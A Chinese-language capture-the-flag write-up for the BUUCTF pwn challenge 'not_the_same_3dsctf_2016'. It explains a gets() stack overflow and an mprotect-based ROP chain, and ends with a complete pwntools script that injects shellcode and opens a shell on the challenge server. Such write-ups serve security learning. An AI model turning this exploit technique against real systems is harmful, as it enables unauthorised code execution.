BUUCTF-PWN-not_the_same_3dsctf_2016

7 篇文章 0 订阅

查看文件信息

开了个NX保护
在这里插入图片描述

IDA静态分析

开始看上去 其实就是利用gets()来溢出的
在这里插入图片描述

我们可以 shift+f12 查看字符串 可以看到 flag.txt 这个字符串

在这里插入图片描述
我们进去看一看…开始的思路其实是利用gets函数溢出来覆盖返回地址去读出flag,然后利用get_secret函数的输入点造成溢出覆盖返回地址到write函数的地址,打印出unk_80CF91B里面储存flag的内容,但是要知道的是,fgets函数其实是有保护机制的,所以我们利用这个是读不到flag的,而f14g在bss段 根本没有ret指令可以利用
在这里插入图片描述

但是 这里面有mprotect函数 可以用它来修改我们内存栈的权限,让它可读可写可执行,接着让写入shellcode,然后执行获取shell
在这里插入图片描述
这里我们需要借助三个参数的三个寄存器指令

ROPgadget --binary pwn --only “pop|ret” | grep pop

在这里插入图片描述
将.got.plt改为可读可执行
在这里插入图片描述
将返回地址填写成read函数,传入read函数的参数,然后将返回地址改为我们修改为可读可写可执行的地址,最好去写入shellcode 函数

exp

from pwn import *


elf = ELF('pwn')
#r = process('pwn')
r = remote('node3.buuoj.cn',27357)

mprotect_addr = 0x0806ed40
addr = 0x080eb000
ret_addr = 0x0806fcc8
read_addr = elf.symbols['read']

shellcode = asm(shellcraft.sh())

payload = 'a' * 0x2d+p32(mprotect_addr)+p32(ret_addr)
payload += p32(addr)+p32(0x100)+p32(0x7)
payload+= p32(read_addr)+p32(ret_addr)
payload+=p32(0)+p32(addr)+p32(len(shellcode))+p32(addr)

r.sendline(payload)
r.sendline(shellcode)

r.interactive()
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值